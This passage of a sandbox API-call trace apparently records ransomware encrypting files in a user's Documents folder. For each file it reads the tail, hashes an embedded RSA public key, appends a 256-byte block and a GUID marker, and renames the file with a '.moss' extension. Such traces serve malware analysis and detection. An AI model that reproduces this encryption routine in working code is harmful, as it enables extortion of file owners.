lpOverlapped=0x0) returned 1 [0169.627] CloseHandle (hObject=0x664) returned 1 [0169.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x35b7de8 [0169.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0169.628] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6kq1Q5gxebf0czzCUr2.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6kq1q5gxebf0czzcur2.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6kq1Q5gxebf0czzCUr2.docx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6kq1q5gxebf0czzcur2.docx.moss")) returned 1 [0169.629] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58153d60, ftCreationTime.dwHighDateTime=0x1d5e5a1, ftLastAccessTime.dwLowDateTime=0x98ecf4f0, ftLastAccessTime.dwHighDateTime=0x1d5e1f9, ftLastWriteTime.dwLowDateTime=0x98ecf4f0, ftLastWriteTime.dwHighDateTime=0x1d5e1f9, nFileSizeHigh=0x0, nFileSizeLow=0xf57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8eUHyn88AeSWE.odp", cAlternateFileName="8EUHYN~1.ODP")) returned 1 [0169.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.630] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8eUHyn88AeSWE.odp") returned=".odp" [0169.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8eUHyn88AeSWE.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8euhyn88aeswe.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.630] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=3927) returned 1 [0169.630] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.633] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.633] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.633] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xf57, lpOverlapped=0x0) returned 1 [0169.633] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.633] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.633] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.633] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.634] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.635] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.635] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.635] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.635] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.635] GetLastError () returned 0x0 [0169.635] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.635] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.635] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.635] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.635] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.635] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.635] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.635] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b49788 [0169.635] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf57, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.636] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.636] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.636] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.636] CloseHandle (hObject=0x664) returned 1 [0169.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b48820 [0169.637] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8eUHyn88AeSWE.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8euhyn88aeswe.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8eUHyn88AeSWE.odp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8euhyn88aeswe.odp.moss")) returned 1 [0169.639] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91e33d20, ftCreationTime.dwHighDateTime=0x1d58eae, ftLastAccessTime.dwLowDateTime=0x57778dd0, ftLastAccessTime.dwHighDateTime=0x1d5bcd0, ftLastWriteTime.dwLowDateTime=0x57778dd0, ftLastWriteTime.dwHighDateTime=0x1d5bcd0, nFileSizeHigh=0x0, nFileSizeLow=0xc022, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BhlJGzYb5rmhnwh9Mo.docx", cAlternateFileName="BHLJGZ~1.DOC")) returned 1 [0169.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.639] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BhlJGzYb5rmhnwh9Mo.docx") returned=".docx" [0169.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BhlJGzYb5rmhnwh9Mo.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bhljgzyb5rmhnwh9mo.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.640] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=49186) returned 1 [0169.640] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.643] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xbffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.643] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.644] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xc022, lpOverlapped=0x0) returned 1 [0169.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.645] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.646] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.646] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.646] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.646] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.647] GetLastError () returned 0x0 [0169.647] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.647] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.647] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.647] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.647] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.647] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.648] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc022, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.648] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.648] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.648] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.648] CloseHandle (hObject=0x664) returned 1 [0169.649] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.649] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0169.650] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BhlJGzYb5rmhnwh9Mo.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bhljgzyb5rmhnwh9mo.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BhlJGzYb5rmhnwh9Mo.docx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bhljgzyb5rmhnwh9mo.docx.moss")) returned 1 [0169.652] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77d59b20, ftCreationTime.dwHighDateTime=0x1d5890f, ftLastAccessTime.dwLowDateTime=0xceab4620, ftLastAccessTime.dwHighDateTime=0x1d57cdf, ftLastWriteTime.dwLowDateTime=0xceab4620, ftLastWriteTime.dwHighDateTime=0x1d57cdf, nFileSizeHigh=0x0, nFileSizeLow=0x815f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bmVamccT.docx", cAlternateFileName="BMVAMC~1.DOC")) returned 1 [0169.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.652] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmVamccT.docx") returned=".docx" [0169.652] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmVamccT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bmvamcct.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.652] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=33119) returned 1 [0169.652] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.655] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x8139, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.655] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.656] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x815f, lpOverlapped=0x0) returned 1 [0169.657] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.657] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.657] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.657] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.658] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.658] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.658] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.658] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.658] GetLastError () returned 0x0 [0169.658] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.658] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.658] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.658] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.658] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.659] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b50988 [0169.659] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x815f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.659] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.659] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.659] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.660] CloseHandle (hObject=0x664) returned 1 [0169.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a98 [0169.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b48820 [0169.661] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmVamccT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bmvamcct.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmVamccT.docx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bmvamcct.docx.moss")) returned 1 [0169.663] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb71f860, ftCreationTime.dwHighDateTime=0x1d5df1c, ftLastAccessTime.dwLowDateTime=0xdd2c72f0, ftLastAccessTime.dwHighDateTime=0x1d5e30f, ftLastWriteTime.dwLowDateTime=0xdd2c72f0, ftLastWriteTime.dwHighDateTime=0x1d5e30f, nFileSizeHigh=0x0, nFileSizeLow=0xdc89, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bUI6gz9k xvqeKo.xlsx", cAlternateFileName="BUI6GZ~1.XLS")) returned 1 [0169.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.663] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bUI6gz9k xvqeKo.xlsx") returned=".xlsx" [0169.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bUI6gz9k xvqeKo.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bui6gz9k xvqeko.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.663] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=56457) 